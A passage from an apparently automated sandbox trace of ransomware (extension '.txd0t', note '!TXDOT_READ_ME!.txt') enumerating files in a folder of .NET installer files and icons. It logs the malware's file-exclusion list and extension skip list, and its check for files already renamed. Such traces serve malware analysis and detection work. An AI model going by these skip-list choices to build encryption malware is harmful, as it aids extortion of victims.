cFileName="stop.ico", cAlternateFileName="")) returned 1 [0128.856] StrCmpW (psz1="stop.ico", psz2=".") returned 1 [0128.856] StrCmpW (psz1="stop.ico", psz2="..") returned 1 [0128.856] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0128.856] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0128.856] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="stop.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned="C:\\588bce7c90097ed212\\Graphics\\stop.ico" [0128.856] PathFindExtensionW (pszPath="stop.ico") returned=".ico" [0128.856] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0128.856] StrCmpIW (psz1="stop.ico", psz2="bootsect.bak") returned 1 [0128.856] StrCmpIW (psz1="stop.ico", psz2="iconcache.db") returned 1 [0128.856] StrCmpIW (psz1="stop.ico", psz2="thumbs.db") returned -1 [0128.856] StrCmpIW (psz1="stop.ico", psz2=" ransomware ") returned 1 [0128.856] StrCmpIW (psz1="stop.ico", psz2=" ransom ") returned 1 [0128.856] StrCmpIW (psz1="stop.ico", psz2="debug.txt") returned 1 [0128.856] StrCmpIW (psz1="stop.ico", psz2="boot.ini") returned 1 [0128.856] StrCmpIW (psz1="stop.ico", psz2="desktop.ini") returned 1 [0128.856] StrCmpIW (psz1="stop.ico", psz2="autorun.inf") returned 1 [0128.856] StrCmpIW (psz1="stop.ico", psz2="ntuser.dat") returned 1 [0128.856] StrCmpIW (psz1="stop.ico", psz2="ntldr") returned 1 [0128.856] StrCmpIW (psz1="stop.ico", psz2="ntdetect.com") returned 1 [0128.856] StrCmpIW (psz1="stop.ico", psz2="bootfont.bin") returned 1 [0128.856] StrCmpIW (psz1="stop.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.856] PathFindExtensionW (pszPath="stop.ico") returned=".ico" [0128.856] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.856] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="SysReqMet.ico", cAlternateFileName="SYSREQ~1.ICO")) returned 1 [0128.856] StrCmpW (psz1="SysReqMet.ico", psz2=".") returned 1 [0128.856] StrCmpW (psz1="SysReqMet.ico", psz2="..") returned 1 [0128.856] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0128.856] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0128.856] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="SysReqMet.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" [0128.856] PathFindExtensionW (pszPath="SysReqMet.ico") returned=".ico" [0128.857] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0128.857] StrCmpIW (psz1="SysReqMet.ico", psz2="bootsect.bak") returned 1 [0128.857] StrCmpIW (psz1="SysReqMet.ico", psz2="iconcache.db") returned 1 [0128.857] StrCmpIW (psz1="SysReqMet.ico", psz2="thumbs.db") returned -1 [0128.857] StrCmpIW (psz1="SysReqMet.ico", psz2=" ransomware ") returned 1 [0128.857] StrCmpIW (psz1="SysReqMet.ico", psz2=" ransom ") returned 1 [0128.857] StrCmpIW (psz1="SysReqMet.ico", psz2="debug.txt") returned 1 [0128.857] StrCmpIW (psz1="SysReqMet.ico", psz2="boot.ini") returned 1 [0128.857] StrCmpIW (psz1="SysReqMet.ico", psz2="desktop.ini") returned 1 [0128.857] StrCmpIW (psz1="SysReqMet.ico", psz2="autorun.inf") returned 1 [0128.857] StrCmpIW (psz1="SysReqMet.ico", psz2="ntuser.dat") returned 1 [0128.857] StrCmpIW (psz1="SysReqMet.ico", psz2="ntldr") returned 1 [0128.857] StrCmpIW (psz1="SysReqMet.ico", psz2="ntdetect.com") returned 1 [0128.857] StrCmpIW (psz1="SysReqMet.ico", psz2="bootfont.bin") returned 1 [0128.857] StrCmpIW (psz1="SysReqMet.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.857] PathFindExtensionW (pszPath="SysReqMet.ico") returned=".ico" [0128.857] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.857] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="SysReqNotMet.ico", cAlternateFileName="SYSREQ~2.ICO")) returned 1 [0128.857] StrCmpW (psz1="SysReqNotMet.ico", psz2=".") returned 1 [0128.857] StrCmpW (psz1="SysReqNotMet.ico", psz2="..") returned 1 [0128.857] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0128.857] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0128.857] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="SysReqNotMet.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" [0128.857] PathFindExtensionW (pszPath="SysReqNotMet.ico") returned=".ico" [0128.857] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0128.857] StrCmpIW (psz1="SysReqNotMet.ico", psz2="bootsect.bak") returned 1 [0128.857] StrCmpIW (psz1="SysReqNotMet.ico", psz2="iconcache.db") returned 1 [0128.857] StrCmpIW (psz1="SysReqNotMet.ico", psz2="thumbs.db") returned -1 [0128.857] StrCmpIW (psz1="SysReqNotMet.ico", psz2=" ransomware ") returned 1 [0128.857] StrCmpIW (psz1="SysReqNotMet.ico", psz2=" ransom ") returned 1 [0128.857] StrCmpIW (psz1="SysReqNotMet.ico", psz2="debug.txt") returned 1 [0128.857] StrCmpIW (psz1="SysReqNotMet.ico", psz2="boot.ini") returned 1 [0128.857] StrCmpIW (psz1="SysReqNotMet.ico", psz2="desktop.ini") returned 1 [0128.857] StrCmpIW (psz1="SysReqNotMet.ico", psz2="autorun.inf") returned 1 [0128.857] StrCmpIW (psz1="SysReqNotMet.ico", psz2="ntuser.dat") returned 1 [0128.857] StrCmpIW (psz1="SysReqNotMet.ico", psz2="ntldr") returned 1 [0128.858] StrCmpIW (psz1="SysReqNotMet.ico", psz2="ntdetect.com") returned 1 [0128.858] StrCmpIW (psz1="SysReqNotMet.ico", psz2="bootfont.bin") returned 1 [0128.858] StrCmpIW (psz1="SysReqNotMet.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.858] PathFindExtensionW (pszPath="SysReqNotMet.ico") returned=".ico" [0128.858] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.858] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="warn.ico", cAlternateFileName="")) returned 1 [0128.858] StrCmpW (psz1="warn.ico", psz2=".") returned 1 [0128.858] StrCmpW (psz1="warn.ico", psz2="..") returned 1 [0128.858] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0128.858] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0128.858] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="warn.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned="C:\\588bce7c90097ed212\\Graphics\\warn.ico" [0128.858] PathFindExtensionW (pszPath="warn.ico") returned=".ico" [0128.858] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0128.858] StrCmpIW (psz1="warn.ico", psz2="bootsect.bak") returned 1 [0128.858] StrCmpIW (psz1="warn.ico", psz2="iconcache.db") returned 1 [0128.858] StrCmpIW (psz1="warn.ico", psz2="thumbs.db") returned 1 [0128.858] StrCmpIW (psz1="warn.ico", psz2=" ransomware ") returned 1 [0128.858] StrCmpIW (psz1="warn.ico", psz2=" ransom ") returned 1 [0128.858] StrCmpIW (psz1="warn.ico", psz2="debug.txt") returned 1 [0128.858] StrCmpIW (psz1="warn.ico", psz2="boot.ini") returned 1 [0128.858] StrCmpIW (psz1="warn.ico", psz2="desktop.ini") returned 1 [0128.858] StrCmpIW (psz1="warn.ico", psz2="autorun.inf") returned 1 [0128.858] StrCmpIW (psz1="warn.ico", psz2="ntuser.dat") returned 1 [0128.858] StrCmpIW (psz1="warn.ico", psz2="ntldr") returned 1 [0128.858] StrCmpIW (psz1="warn.ico", psz2="ntdetect.com") returned 1 [0128.858] StrCmpIW (psz1="warn.ico", psz2="bootfont.bin") returned 1 [0128.858] StrCmpIW (psz1="warn.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.858] PathFindExtensionW (pszPath="warn.ico") returned=".ico" [0128.858] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.858] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="warn.ico", cAlternateFileName="")) returned 0 [0128.858] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.859] GetProcessHeap () returned 0xe30000 [0128.859] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.859] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x590c0819, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x102c, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="header.bmp.txd0t", cAlternateFileName="HEADER~1.TXD")) returned 1 [0128.859] StrCmpW (psz1="header.bmp.txd0t", psz2=".") returned 1 [0128.859] StrCmpW (psz1="header.bmp.txd0t", psz2="..") returned 1 [0128.859] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.859] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.859] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="header.bmp.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\header.bmp.txd0t") returned="C:\\588bce7c90097ed212\\header.bmp.txd0t" [0128.859] PathFindExtensionW (pszPath="header.bmp.txd0t") returned=".txd0t" [0128.859] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.859] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66ea7e00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0x66ea7e00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x59539078, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xad13a4b, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="netfx_Core.mzz.txd0t", cAlternateFileName="NETFX_~2.TXD")) returned 1 [0128.859] StrCmpW (psz1="netfx_Core.mzz.txd0t", psz2=".") returned 1 [0128.859] StrCmpW (psz1="netfx_Core.mzz.txd0t", psz2="..") returned 1 [0128.859] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.860] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.860] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="netfx_Core.mzz.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\netfx_Core.mzz.txd0t") returned="C:\\588bce7c90097ed212\\netfx_Core.mzz.txd0t" [0128.860] PathFindExtensionW (pszPath="netfx_Core.mzz.txd0t") returned=".txd0t" [0128.860] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.860] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc183da00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0xc183da00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x5958527b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1d0400, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="netfx_Core_x64.msi.txd0t", cAlternateFileName="NETFX_~3.TXD")) returned 1 [0128.860] StrCmpW (psz1="netfx_Core_x64.msi.txd0t", psz2=".") returned 1 [0128.860] StrCmpW (psz1="netfx_Core_x64.msi.txd0t", psz2="..") returned 1 [0128.860] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.860] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.860] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="netfx_Core_x64.msi.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\netfx_Core_x64.msi.txd0t") returned="C:\\588bce7c90097ed212\\netfx_Core_x64.msi.txd0t" [0128.860] PathFindExtensionW (pszPath="netfx_Core_x64.msi.txd0t") returned=".txd0t" [0128.860] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.860] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c130c00, ftCreationTime.dwHighDateTime=0x1cac6d9, ftLastAccessTime.dwLowDateTime=0x4c130c00, ftLastAccessTime.dwHighDateTime=0x1cac6d9, ftLastWriteTime.dwLowDateTime=0x592b054a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11c200, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="netfx_Core_x86.msi.txd0t", cAlternateFileName="NETFX_~1.TXD")) returned 1 [0128.860] StrCmpW (psz1="netfx_Core_x86.msi.txd0t", psz2=".") returned 1 [0128.860] StrCmpW (psz1="netfx_Core_x86.msi.txd0t", psz2="..") returned 1 [0128.860] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.860] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.860] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="netfx_Core_x86.msi.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\netfx_Core_x86.msi.txd0t") returned="C:\\588bce7c90097ed212\\netfx_Core_x86.msi.txd0t" [0128.860] PathFindExtensionW (pszPath="netfx_Core_x86.msi.txd0t") returned=".txd0t" [0128.860] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.860] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf74cd515, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf74cd515, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x599b1edc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x29224c7, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="netfx_Extended.mzz.txd0t", cAlternateFileName="NE27FE~1.TXD")) returned 1 [0128.860] StrCmpW (psz1="netfx_Extended.mzz.txd0t", psz2=".") returned 1 [0128.860] StrCmpW (psz1="netfx_Extended.mzz.txd0t", psz2="..") returned 1 [0128.860] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.860] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.860] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="netfx_Extended.mzz.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\netfx_Extended.mzz.txd0t") returned="C:\\588bce7c90097ed212\\netfx_Extended.mzz.txd0t" [0128.860] PathFindExtensionW (pszPath="netfx_Extended.mzz.txd0t") returned=".txd0t" [0128.860] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.860] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dbe0800, ftCreationTime.dwHighDateTime=0x1cac6fb, ftLastAccessTime.dwLowDateTime=0x2dbe0800, ftLastAccessTime.dwHighDateTime=0x1cac6fb, ftLastWriteTime.dwLowDateTime=0x595ab4e7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xd5200, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="netfx_Extended_x64.msi.txd0t", cAlternateFileName="NETFX_~4.TXD")) returned 1 [0128.860] StrCmpW (psz1="netfx_Extended_x64.msi.txd0t", psz2=".") returned 1 [0128.860] StrCmpW (psz1="netfx_Extended_x64.msi.txd0t", psz2="..") returned 1 [0128.860] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.860] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.861] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="netfx_Extended_x64.msi.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi.txd0t") returned="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi.txd0t" [0128.861] PathFindExtensionW (pszPath="netfx_Extended_x64.msi.txd0t") returned=".txd0t" [0128.861] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.861] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7626f700, ftCreationTime.dwHighDateTime=0x1cac6f6, ftLastAccessTime.dwLowDateTime=0x7626f700, ftLastAccessTime.dwHighDateTime=0x1cac6f6, ftLastWriteTime.dwLowDateTime=0x5961dbfc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x79200, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="netfx_Extended_x86.msi.txd0t", cAlternateFileName="NE814D~1.TXD")) returned 1 [0128.861] StrCmpW (psz1="netfx_Extended_x86.msi.txd0t", psz2=".") returned 1 [0128.861] StrCmpW (psz1="netfx_Extended_x86.msi.txd0t", psz2="..") returned 1 [0128.861] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.861] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.861] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="netfx_Extended_x86.msi.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi.txd0t") returned="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi.txd0t" [0128.861] PathFindExtensionW (pszPath="netfx_Extended_x86.msi.txd0t") returned=".txd0t" [0128.861] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.861] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a0f7400, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x4a0f7400, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x595d177b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x428ae, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="ParameterInfo.xml.txd0t", cAlternateFileName="PARAME~1.TXD")) returned 1 [0128.861] StrCmpW (psz1="ParameterInfo.xml.txd0t", psz2=".") returned 1 [0128.861] StrCmpW (psz1="ParameterInfo.xml.txd0t", psz2="..") returned 1 [0128.861] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.861] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.861] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="ParameterInfo.xml.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\ParameterInfo.xml.txd0t") returned="C:\\588bce7c90097ed212\\ParameterInfo.xml.txd0t" [0128.861] PathFindExtensionW (pszPath="ParameterInfo.xml.txd0t") returned=".txd0t" [0128.861] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.861] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19dedd00, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x19dedd00, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x5966a03f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x2d400, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="RGB9RAST_x64.msi.txd0t", cAlternateFileName="RGB9RA~2.TXD")) returned 1 [0128.861] StrCmpW (psz1="RGB9RAST_x64.msi.txd0t", psz2=".") returned 1 [0128.861] StrCmpW (psz1="RGB9RAST_x64.msi.txd0t", psz2="..") returned 1 [0128.861] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.861] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.861] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="RGB9RAST_x64.msi.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi.txd0t") returned="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi.txd0t" [0128.861] PathFindExtensionW (pszPath="RGB9RAST_x64.msi.txd0t") returned=".txd0t" [0128.861] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.861] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x177c8300, ftCreationTime.dwHighDateTime=0x1ca2a1b, 